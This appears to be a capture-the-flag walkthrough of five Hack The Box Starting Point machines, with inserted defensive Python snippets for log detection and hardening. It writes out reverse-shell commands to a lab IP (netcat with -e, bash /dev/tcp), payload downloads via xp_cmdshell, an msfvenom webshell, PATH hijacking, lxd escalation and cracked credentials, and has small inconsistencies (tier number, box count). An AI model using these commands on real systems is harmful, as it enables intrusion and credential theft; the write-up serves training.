Hack The Box: Starting Point - Tier 2


Tier 3 of the “Starting Point” series consists of six boxes: Archetype, Oopsie, Vaccine, Included and Markup.


Box 1: Archetype

This box is tagged “Windows”, “SMB” and “SQL”. It turns out we can log in to the Windows shares with a guest account and get a shell from there.

Let’s scan it:

The nmap discovery script gives a hint that there might be a guest account which is able to authenticate as user. So let’s try it:

Questions:

  • Which TCP port is hosting a database server? 1433
  • What is the name of the non-Administrative share available over SMB? backups

We can try to log into the backups share and get a prompt:

$ smbclient \\\\10.129.116.192\\backups -U guest

It enables us to download the file prod.dtsConfig which contains a login password in the ConfiguredValue tag:

<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>

  • What is the password identified in the file on the SMB share? M3g4c0rp123
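A defender's counterpart to this finding, added here as an example that is not part of the original write-up: a small Python audit that walks a .dtsConfig file, parses each connection string, and reports which configurations carry a cleartext password (plus the Persist Security Info=True setting seen above) without echoing the secret itself. The sample file is constructed from the value quoted above; the surrounding Configuration element and its Path attribute are my assumption about the file layout.

```python
import xml.etree.ElementTree as ET

# Connection-string keys that carry a secret (OLE DB / SQL Native Client spellings).
SECRET_KEYS = ("password", "pwd")

# Constructed sample modelled on the prod.dtsConfig quoted above. The Path
# attribute and the enclosing Configuration element are assumptions about
# the file layout, not copied from the share.
SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Catalog;Provider=SQLNCLI10.1;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(conn):
    """Split 'Key=Value;Key=Value;' into a dict keyed by lower-cased name."""
    pairs = {}
    for part in conn.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = value.strip()
    return pairs


def audit_dtsconfig(xml_text):
    """Return one finding per connection string that embeds a password.

    The finding names the configuration path, the account and which secret
    key was present; the secret value itself is never copied into the report.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        pairs = parse_connection_string(node.text)
        present = [k for k in SECRET_KEYS if pairs.get(k)]
        if not present:
            continue
        findings.append({
            "path": conf.get("Path", "<no Path attribute>"),
            "user": pairs.get("user id") or pairs.get("uid") or "<unknown>",
            "secret_keys": present,
            # Persist Security Info=True keeps the password readable from the
            # open connection object; report it as a secondary weakness.
            "persists_secret": pairs.get("persist security info", "").lower() == "true",
        })
    return findings


if __name__ == "__main__":
    for f in audit_dtsconfig(SAMPLE_DTSCONFIG):
        print(f"{f['path']}: cleartext {', '.join(f['secret_keys'])} for {f['user']}"
              f" (Persist Security Info={f['persists_secret']})")
```

The fix on the SSIS side is Integrated Security=SSPI (as in the second, clean sample entry) or a credential held in a protected configuration, and a share ACL that does not grant guest read access.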

Now let’s try to log in to the Microsoft SQL server with this password. For this purpose the impacket repository [1] is very helpful.

We can log in with:

impacket-mssqlclient 'ARCHETYPE/sql_svc':'M3g4c0rp123'@10.129.116.192 -windows-auth

We are not able to use standard SQL commands such as show databases; however, the help command shows that we can execute operating-system commands by calling xp_cmdshell.

  • What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server? mssqlclient.py
  • What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? xp_cmdshell

With this, we can browse the directories and get the user flag. Now let’s try to get the root flag as well. For this we need to escalate to administrator privileges.

I tried to upload winpeas.exe to the server, but couldn’t execute it because of missing privileges. So first of all, let’s enable xp_cmdshell with the help of the commands from this cheatsheet [2].

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; -- Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
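On the defensive side, these statements leave a trace: SQL Server records every sp_configure change in its ERRORLOG. The following Python snippet is an added example (not part of the original write-up) that scans ERRORLOG lines for 'show advanced options' and 'xp_cmdshell' being switched from 0 to 1 and names the session that did it; the log lines are constructed to follow the format SQL Server uses for this message.

```python
import re

# One ERRORLOG line: timestamp, spid, free-text message.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+(?P<msg>.*)$"
)
# Text SQL Server writes whenever sp_configure changes an option (message 15457).
CONFIG_RE = re.compile(
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
# Options whose enablement turns a database login into OS-level execution.
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "show advanced options"}

# Constructed ERRORLOG excerpt modelled on the sequence used above.
SAMPLE_ERRORLOG = """\
2020-01-20 11:02:13.08 spid52      Starting up database 'Catalog'.
2020-01-20 11:05:41.51 spid53      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 11:05:41.53 spid53      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2020-01-20 11:30:02.10 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""


def detect_dangerous_enablement(lines):
    """Return an alert for every watched option that is switched from 0 to 1.

    Disabling (1 -> 0) is not alerted; that is what a clean-up looks like.
    """
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        c = CONFIG_RE.search(m.group("msg"))
        if not c:
            continue
        option = c.group("option")
        if option in WATCHED and c.group("old") == "0" and c.group("new") == "1":
            alerts.append({"time": m.group("ts"), "spid": m.group("spid"), "option": option})
    return alerts


def sessions_enabling_xp_cmdshell(alerts):
    """spids that enabled xp_cmdshell itself: the sessions to look up in the
    login audit so the change can be attributed to a principal."""
    return sorted({a["spid"] for a in alerts if a["option"] == "xp_cmdshell"})


if __name__ == "__main__":
    found = detect_dangerous_enablement(SAMPLE_ERRORLOG.splitlines())
    for a in found:
        print(f"{a['time']} {a['spid']}: '{a['option']}' enabled")
    print("sessions enabling xp_cmdshell:", sessions_enabling_xp_cmdshell(found))
```

Pairing this with a policy that keeps xp_cmdshell disabled and denies the service account sysadmin membership turns the sequence above into a loud, attributable event rather than a silent step.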

Instead of running winpeas on the server directly, let’s try to establish a netcat session first. For this, we can download nc.exe to the sql_svc user’s folder. First we start an HTTP server in our local folder and open the listener:

$ python3 -m http.server 80
$ sudo nc -lnvp 443

And then download it to the server and call it:

SQL> xp_cmdshell curl http://10.10.14.71/nc.exe --output C:\Users\sql_svc\nc.exe
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc; .\nc.exe -e cmd.exe 10.10.14.71 443"

Now we have a shell! Let’s run winpeas again. We need to download it by clicking on the “raw” file (this was where I went wrong before). Then we upload it and run it just like before with nc.exe. It returns a lot of output, among others a readable console history file.

When we open it, we get the admin password.

  • What script can be used in order to search possible paths to escalate privileges on Windows hosts? winpeas
  • What file contains the administrator’s password? MEGACORP_4dm1n!!

With this, we can log in as admin user using the Impacket psexec.py package and find the root flag on the administrator’s desktop.

$ impacket-psexec administrator@10.129.116.192

  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 2: Oopsie

This box is tagged “Linux”, “Web”, “PHP” and “SUID”. It turns out we can log into the web application by modifying the cookies, then upload a reverse shell and use the suid bit of a Linux binary to get root privileges.

Questions:

  • With what kind of tool can we intercept web traffic? Proxy

We see that there is a web service running on port 80. It is showing us a landing page of a company called “MegaCorp”. There is a hint that we might be able to log in (“Please login to get access to the service”), but the login button is nowhere to be found.

dirb and gobuster don’t find any path either. So let’s check it with a Burp proxy as the last question suggested. Under the “Target” tab we can check the page’s sitemap:

Besides the css/, themes/ and js/ folders that were already found with dirb, we also find a very interesting cdn-cgi/login link, which leads us to a login page.

  • What is the path to the directory on the webserver that returns a login page? cdn-cgi/login
  • What can be modified in Firefox to get access to the upload page? cookie

The page offers the opportunity to log in as guest, so let’s do this and check what happens behind the scenes in Burp. We get redirected to a page called login/admin.php, which shows the “Repair Management System”. It seems that we might be able to log in as the admin user if we find the right user/role combination.

We can send the request to Burp Intruder and test all numbers from 1 to 100 for the role “admin”. To generate a file with all the numbers, we can use a little shell script:

i=0
while [ $i -le 200 ]
do
   echo $i >> numbers.txt
   i=$(($i+1))
done

Then we load the numbers.txt file into Burp. This tests the user numbers 0 to 200 in combination with the usernames “admin”, “superadmin” and “administrator”. However, all of these tests are unsuccessful, so let’s return to the page and look around some more. Interestingly, there is a page called accounts, which simply passes the account ID as a GET parameter in the URL.

The account ID is not the same as the access ID. It turns out we can change the ID and retrieve arbitrary accounts - most importantly, the admin user with ID 1 and access ID 34322.

  • What is the access ID of the admin user? 34322
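Added example, not from the original write-up: the ID-changing described above shows up in the web server’s access log as one client walking through many distinct id values in a short time. This Python script parses combined-format log lines and raises an alert when one source hits the accounts view with five or more different IDs inside a minute. The log lines are constructed; the path and parameter name (admin.php?content=accounts&id=...) are assumptions modelled on the page, so adjust them to the application.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format: ip ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed access-log excerpt. The first client requests ids 1..6 within ten
# seconds; the second is a legitimate user viewing its own account twice.
ACCOUNT_VIEW = "/cdn-cgi/login/admin.php?content=accounts&id="
SAMPLE_ACCESS_LOG = [
    f'10.10.14.71 - - [20/Jan/2020:11:05:{sec:02d} +0000] "GET {ACCOUNT_VIEW}{i} HTTP/1.1" 200 1420 "-" "Mozilla/5.0"'
    for i, sec in zip(range(1, 7), range(1, 13, 2))
] + [
    '192.0.2.10 - - [20/Jan/2020:11:05:04 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=34 HTTP/1.1" 200 1402 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [20/Jan/2020:11:05:40 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=34 HTTP/1.1" 200 1402 "-" "Mozilla/5.0"',
    '10.10.14.71 - - [20/Jan/2020:11:04:50 +0000] "GET /cdn-cgi/login/index.php HTTP/1.1" 200 3102 "-" "Mozilla/5.0"',
]


def parse_account_views(lines, path="/cdn-cgi/login/admin.php", param="id"):
    """Yield (ip, time, id) for every request to the account view carrying the id parameter."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        if parts.path != path:
            continue
        ids = parse_qs(parts.query).get(param)
        if not ids:
            continue
        yield m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT), ids[0]


def detect_id_enumeration(lines, threshold=5, window_s=60, **kw):
    """One alert per source IP that requests >= threshold distinct ids within window_s seconds."""
    per_ip = defaultdict(list)
    for ip, ts, ident in parse_account_views(lines, **kw):
        per_ip[ip].append((ts, ident))
    alerts = []
    for ip, events in per_ip.items():
        events.sort()
        start = 0  # left edge of the sliding time window
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            distinct = {ident for _, ident in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts.append({"ip": ip, "distinct_ids": len(distinct),
                               "first": events[start][0].isoformat(),
                               "last": events[end][0].isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_id_enumeration(SAMPLE_ACCESS_LOG):
        print(f"{a['ip']}: {a['distinct_ids']} distinct account ids between {a['first']} and {a['last']}")
```

Detection is the second line of defence; the first is that the server decides which account a session may view from its own session store rather than from an id or a cookie the browser supplies.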

With this knowledge, we can modify our cookie to log in as the admin user with help of the Match & Replace utility in Burp. Now we can view the “Upload” panel, which requires admin rights. If we upload an arbitrary file, we don’t see where it has been uploaded.

However, our previous scan with dirb revealed that there is a folder called uploads. In this folder, we can access the document (test.jpg) under its plaintext name.

  • On uploading a file, what directory does that file appear in on the server? uploads/

This calls for a shell. Since the website is running on PHP, let’s try to upload a PHP reverse shell, for example the White Winter Wolf interactive shell [2]. It is accepted, and when we visit the uploads folder, we get a webshell. Now we can search the directory for interesting files.

which nc reveals that the server has netcat installed. However, it turns out that the -c and -e options are disabled, so we can’t connect to the outside. Instead, let’s use a different webshell, php-reverse-shell from the /usr/shared folder. Using this, we immediately get a shell on the system and can read the user flag from Robert. Before that, we upgrade the shell to a full tty with python3 -c 'import pty; pty.spawn("/bin/sh")'.

Also, we find some MySQL connection info in the db.php file of the www directory:

<?php
   $conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

It turns out that we can log in as user robert with su - robert and this password.

  • What is the file that contains the password that is shared with the robert user? db.php

Let’s investigate the robert user further. He belongs to the group bugtracker:

$ groups robert
robert : robert bugtracker

(better enumeration is with id). sudo -l shows that he has no sudo-permissions on the system. Let’s see if the bugtracker group is more powerful.

$ find / -group bugtracker 2>/dev/null

reveals all files that belong to the bugtracker group. In our case there is only one, /usr/bin/bugtracker. We can try to modify that one; also, it has the “s” bit set for Set User ID upon execution (setuid).

$ ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker

$ file /usr/bin/bugtracker
/usr/bin/bugtracker: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=b87543421344c400a95cbbe34bbc885698b52b8d, not stripped

The setuid bit means that the program runs with root privileges even if it is started as user robert, because a file with SUID always executes as the user who owns the file (regardless of the user invoking the command).

  • What executable is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? find
  • Regardless of which user starts running the bugtracker executable, whose user privileges will it use to run? root
  • What does SUID stand for? Set owner User ID

Let’s run the script to see what it does:

It collects some data out of files. Let’s try it again with a less likely number:

And we see that the program calls the cat command. Note that it calls only cat, not /bin/cat. This means we might be able to shadow the cat command with our own binary by adding its directory to the beginning of the PATH.

The current path is:

robert@oopsie:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

so let’s add the local directory /tmp, containing a new binary, to the front of the path.

robert@oopsie:~$ export PATH=/tmp:$PATH

Now the tmp folder is searched before the /bin folder. There we create a file cat with the following content: /bin/sh and make it executable. Now we get the root shell and can submit the root flag.
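As an added example (not part of the original write-up), here is the audit a defender would run against the same weakness: a Python script that emulates the shell’s PATH search for a bare command name and lists the PATH entries an unprivileged user could drop a binary into (the current directory, relative entries, world-writable directories such as /tmp). The filesystem view is injectable so the behaviour can be shown on constructed data; run it without arguments to also audit the current PATH.

```python
import os
import stat
from types import SimpleNamespace


def resolve_command(name, path, exists=os.path.isfile):
    """Emulate the shell's lookup of a bare command name: the first PATH entry
    holding a file of that name wins. `exists` is injectable for testing."""
    for entry in path.split(":"):
        candidate = os.path.join(entry or ".", name)
        if exists(candidate):
            return candidate
    return None


def risky_path_entries(path, stat_fn=os.stat):
    """Return (entry, reason) for PATH entries an unprivileged user can plant a
    binary in: the current directory, relative entries, and world-writable
    directories (the sticky bit does not stop creating a new file there)."""
    risky = []
    for entry in path.split(":"):
        if entry in ("", "."):
            risky.append((entry or "<empty>", "current directory is searched"))
            continue
        if not os.path.isabs(entry):
            risky.append((entry, "relative entry"))
            continue
        try:
            st = stat_fn(entry)
        except OSError:
            continue  # missing directory: nothing to plant into (yet)
        if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_IWOTH:
            risky.append((entry, "world-writable directory"))
    return risky


# Constructed filesystem view for a stand-alone demonstration of the situation
# described above: /tmp is world-writable and holds a fake cat.
FAKE_FILES = {"/tmp/cat", "/bin/cat", "/usr/bin/find"}
FAKE_MODES = {"/tmp": 0o41777, "/usr/local/bin": 0o40755, "/usr/bin": 0o40755, "/bin": 0o40755}


def fake_stat(p):
    if p not in FAKE_MODES:
        raise FileNotFoundError(p)
    return SimpleNamespace(st_mode=FAKE_MODES[p])


def demo(path="/tmp:/usr/local/bin:/usr/bin:/bin"):
    """Return what 'cat' resolves to under the given PATH in the constructed view."""
    return resolve_command("cat", path, exists=lambda p: p in FAKE_FILES)


if __name__ == "__main__":
    print("constructed view: cat ->", demo())
    print("constructed view: risky ->", risky_path_entries("/tmp:/usr/bin:/bin", fake_stat))
    # Real audit of this machine's PATH.
    print("this machine: risky ->", risky_path_entries(os.environ.get("PATH", "")))
```

For the setuid program itself the fix is independent of PATH: invoke helpers by absolute path (or reset PATH to a fixed value at start-up) and never run a privileged binary with an environment the caller controls.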

  • What is the name of the executable being called in an insecure manner? cat
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 3: Vaccine

This box is tagged “Linux”, “FTP”, “SQL” and “SUID”.

The nmap scan shows that there is an FTP server which allows anonymous login and provides a file called backup.zip. We can download it and try to unzip it, but it requires a password.

  • Besides SSH and HTTP, what other service is hosted on this box? FTP
  • This service can be configured to allow login with any password for specific username. What is that username? anonymous
  • What is the name of the file downloaded over this service? backup.zip

Also, there is a web server on port 80 called “MegaCorp Login” with a login page. I tried to bomb it with the default credentials, but there was no hit.

So let’s go back to the backup.zip file and try to crack it. We can use zip2john for this, following this tutorial [3]. First we generate the hash file, and then we crack it using the standard wordlist from john.

$ zip2john backup.zip > hash.txt
$ john hash.txt
$ unzip backup.zip

The password is 741852963 (= a pattern on a num pad).

  • What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? zip2john

And in the backup file, we find a hard-coded password:

<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

Let’s see if it still works. First we need to recover the plaintext password from the MD5 hash. Let’s use hashcat for this. First we double-check that the hash is really an MD5 using hashid -m <hash>. Then we run it with a short list, but without success. However, with rockyou.txt we get the answer within seconds.

  • What is the password for the admin user on the website? qwerty789
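The login code above compares an unsalted MD5 digest, which is why a wordlist recovers the password in seconds. As an added example that is not part of the original write-up, here is the Python equivalent of the hardened form: a salted, deliberately slow key derivation (PBKDF2-HMAC-SHA256), a constant-time comparison, and a check that recognises legacy 32-hex MD5 values so those accounts can be re-hashed at their next successful login. The iteration count follows current OWASP guidance for PBKDF2-HMAC-SHA256.

```python
import base64
import hashlib
import hmac
import os
import re

# OWASP's current recommendation for PBKDF2-HMAC-SHA256.
ITERATIONS = 600_000
LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing string 'pbkdf2_sha256$iterations$salt$key'.

    A fresh random 16-byte salt per password means identical passwords get
    different hashes and a wordlist has to be run per user, not per site.
    """
    salt = os.urandom(16) if salt is None else salt
    key = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations, base64.b64encode(salt).decode(), base64.b64encode(key).decode())


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_b64, key_b64 = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(key_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)


def is_legacy_md5(stored):
    """True for a bare 32-hex digest like the one in the login code above; such
    accounts should be re-hashed with hash_password() at their next login."""
    return bool(LEGACY_MD5.match(stored))


if __name__ == "__main__":
    record = hash_password("correct horse")  # constructed password
    print(record)
    print("right password:", verify_password("correct horse", record))
    print("wrong password:", verify_password("correct hors", record))
    print("legacy md5 needs upgrade:", is_legacy_md5("2cb42f8734ea607eefed3b70af13bbd3"))
```

The === comparison in the PHP above is also not constant-time, but with an unsalted fast hash that is the lesser problem; the salt and the work factor are what make an offline wordlist run expensive.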

We get redirected to the dashboard. There we get a table with database output. The search string is submitted via a URL parameter.

Let’s see if SQL injection is possible here. For example, we can enumerate the number of columns by injecting ' ORDER BY X-- -. With 6, we get an error message:

But we can also do it the easy way and use sqlmap. With this command, we get a shell as postgres user:

$ sqlmap -u 'http://10.129.117.4/dashboard.php' --data 'search=P' --cookie='PHPSESSID=ton2h67hjn3plqh6r9k496dpe0' --os-shell

  • What option can be passed to sqlmap to try to get command execution via the sql injection? --os-shell
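Why the ORDER BY probe works, and what stops it, as an added example (not the page’s code and not the box’s real schema): a small sqlite3 demonstration with a search written by string concatenation next to the same search written with a bound parameter. The cars table and its rows are constructed.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the dashboard's table (not the box's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE cars(id INTEGER PRIMARY KEY, name TEXT, type TEXT);
        INSERT INTO cars(name, type) VALUES ('Elixir', 'Sports'), ('Sandy', 'Sedan'), ('Meta', 'SUV');
    """)
    return conn


def search_vulnerable(conn, term):
    """The dashboard pattern: the search term is pasted into the SQL text, so a
    quote ends the string literal and the rest becomes SQL grammar.

    Returns the rows, or the database error message: that message is what the
    ORDER BY X probe above reads back to count the columns.
    """
    sql = "SELECT name, type FROM cars WHERE name LIKE '%" + term + "%'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        return str(e)


def search_parameterized(conn, term):
    """Hardened form: the term is bound as a value; quotes, comments and
    ORDER BY inside it are just characters to match against."""
    return conn.execute(
        "SELECT name, type FROM cars WHERE name LIKE ?", ("%" + term + "%",)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    for probe in ["Eli", "' ORDER BY 2-- -", "' ORDER BY 3-- -"]:
        print(repr(probe))
        print("  concatenated :", search_vulnerable(db, probe))
        print("  parameterized:", search_parameterized(db, probe))
```

With two result columns, ORDER BY 2 is silently accepted by the concatenated query and ORDER BY 3 produces an error that names the valid range; the parameterized query returns no rows for either, because no car is literally named that.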

Then we get a very simple shell, but we need to upgrade it. Unfortunately most commands from this cheatsheet don’t work, and calling a shell with netcat doesn’t work either, although it’s installed on the server. However, we can get a shell with the following bash command:

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.71/443 0>&1"

After that we can stabilize the shell with python3 -c 'import pty; pty.spawn("/bin/bash")'. From there we can get the user flag. Now let’s see if we can find any password, because often the database is connected from PHP using a cleartext password. And indeed, we find it in the www folder in the dashboard.php file:

try { $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!"); }

Maybe the local user postgres is using the same password. Let’s try by calling sudo -l, which lists all executables that the user is allowed to run with sudo.

Nice! According to GTFOBins, we can spawn a root shell with this. Let’s run the command: sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf. The output is rather strange as we don’t have a fully functional terminal, but typing :!/bin/sh works anyway and we get a root shell.

  • What program can the postgres user run as root using sudo? vi
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 4: Included

This box is tagged “Linux”, “FTP”, “Java”, “PHP” and “LFI”.

The regular top-1000 nmap scan returns only a web server on port 80. Since the next question asks for a UDP port, let’s check that as well.

Scanning for the top 100 UDP ports returns a dhcpc service on port 68 and a tftp service on port 69.

We can access the service without a password, but directory listing is not possible, so we don’t know which files could potentially be downloaded.

  • What service is running on the target machine over UDP? TFTP

Next, let’s check the webserver running on port 80. The start page already shows that some file is included.

It turns out we can even access files outside of the web directory.

  • What class of vulnerability is the webpage that is hosted on port 80 vulnerable to? local file inclusion
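Added example, not part of the original write-up: how a file-inclusion parameter should be handled on the server side, in Python. resolve_include() only accepts names from an allowlist and additionally confirms that the resolved path stays inside the pages directory, while looks_like_lfi() classifies request values such as the ones used on this box so attempts can be flagged in the access log. The PAGES_DIR path and the allowlist entries are assumptions.

```python
import os
import re

# Assumed layout of the includable pages; adjust to the application.
PAGES_DIR = "/var/www/html/pages"
ALLOWED_PAGES = frozenset({"home.php", "about.php", "contact.php"})

# Markers that have no business in a page-name parameter: directory traversal,
# absolute Unix or Windows paths, URL/stream wrappers, and NUL truncation.
LFI_MARKERS = re.compile(r"(\.\./|\.\.\\|^/|^[A-Za-z]:\\|://|%00|\x00)")


def looks_like_lfi(value):
    """Classifier for request parameters; useful to flag attempts in access logs."""
    return bool(LFI_MARKERS.search(value))


def resolve_include(requested, base_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Return the absolute path to include, or raise ValueError.

    Two independent checks: an allowlist of page names, and a realpath
    containment check so that even an allowlisted name cannot escape base_dir
    (for example through a symlink planted in the pages directory).
    """
    if requested not in allowed:
        raise ValueError("page not in allowlist: %r" % requested)
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, full]) != base:
        raise ValueError("path escapes base directory: %r" % requested)
    return full


if __name__ == "__main__":
    for value in ["home.php", "../../../../etc/passwd", "/var/lib/tftpboot/shell.php"]:
        try:
            where = resolve_include(value)
            verdict = "include " + where
        except ValueError as e:
            verdict = "rejected (" + str(e) + ")"
        print(f"{value!r}: suspicious={looks_like_lfi(value)} -> {verdict}")
```

The allowlist alone would have stopped both payloads used on this box; the containment check is the safety net for the day the allowlist is loaded from somewhere an attacker can influence.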

In order to exploit the vulnerability, we further enumerate the server. gobuster doesn’t reveal any further interesting directories, but reveals that the files .htaccess and .htpasswd might exist on the server.

And indeed, we find the credentials for the user Mike in cleartext in the .htpasswd file.

Besides the password file, we might also use the open TFTP server to upload a webshell and execute it via the LFI. Let’s create a shell with meterpreter:

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.18 LPORT=4444 -f raw > shell.php

Before we upload the shell, we need to remove the comment from the beginning of the file and add a ?> to the end. Next, we upload this shell to the TFTP server (with put shell.php) and start the listener with msfconsole. Then we access the file at ?file=/var/lib/tftpboot/shell.php, but unfortunately the session fails.

The next try is with /usr/share/webshells/php/php-reverse-shell.php from Kali Linux. This one works and we get a shell:

  • What is the default system folder that TFTP uses to store files? /var/lib/tftpboot
  • Which interesting file is located in the web server folder and can be used for Lateral Movement? .htpasswd

Now let’s log in as user Mike and see what else we can do there. sudo -l returns nothing helpful, but Mike is part of the lxd group. We will see how to use that.

  • What is the group that user Mike is a part of and can be exploited for Privilege Escalation? lxd

According to this article [4], we can escalate to root privileges if we follow the steps described there.

  • When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name? alpine

These are the steps: on our machine, we download the alpine image and create the tar.gz file.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

Then we start a python web server on our machine and fetch the file with wget from the victim machine. After that we follow the commands from the blog post and get root privileges.

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

  • What flag do we set to the container so that it has root privileges on the host system? security.privileged=true
  • If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted? /mnt/root/root
  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!

Box 5: Markup

This box is tagged “Windows” and “XXE”.

The nmap scan reveals a web server on ports 80 and 443 as well as an SSH server on port 22.

  • What version of Apache is running on the target’s port 80? 2.4.41

Visiting the website, we see a login page.

We can catch the POST request to the web server with Burp Suite. We see that it uses the payload username=xx&password=yy and returns “Wrong Credentials” if the password is wrong.

We can feed this information into hydra and run a brute force scan. After a few trials, we get a hit.

$ hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/best15.txt 10.129.108.32 http-post-form "/:username=^USER^&password=^PASS^:Wrong Credentials" -V

The combination that works is admin:password.

  • What username:password combination logs in successfully? admin:password

We get to a very simple shop system. The “Order” tab is accepting user input.

Let’s see how it looks in Burp:

The user input is processed as XML data, so maybe we can use an XXE (XML External Entity) injection attack on it.

  • What is the word at the top of the page that accepts user input? order
  • What XML version is used on the target? 1.0
  • What does the XXE / XEE attack acronym stand for? XML External Entity
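The safe way to consume the order XML, as an added example that is not the page’s code: a Python parser built on expat that refuses any DOCTYPE, entity declaration or external entity reference before a single element is processed, which is the property that makes XXE impossible. The order/quantity/item/address element names are assumptions about the shop’s request format.

```python
import xml.parsers.expat as expat


class DtdForbidden(ValueError):
    """Raised as soon as the document declares a DTD or an entity."""


def parse_order(xml_bytes):
    """Parse the shop's order XML into {element: text} with a parser that is
    hostile to DTDs: every hook through which an entity could be declared or
    fetched raises before any content is processed."""
    fields = {}
    stack = []

    def forbid(*_):
        raise DtdForbidden("DOCTYPE/ENTITY declarations are not accepted")

    def start(name, attrs):
        stack.append(name)
        fields.setdefault(name, "")

    def end(name):
        stack.pop()

    def chars(data):
        if stack:
            fields[stack[-1]] += data

    p = expat.ParserCreate()
    p.StartDoctypeDeclHandler = forbid      # <!DOCTYPE ...>, internal or external subset
    p.EntityDeclHandler = forbid            # <!ENTITY ...> of any kind
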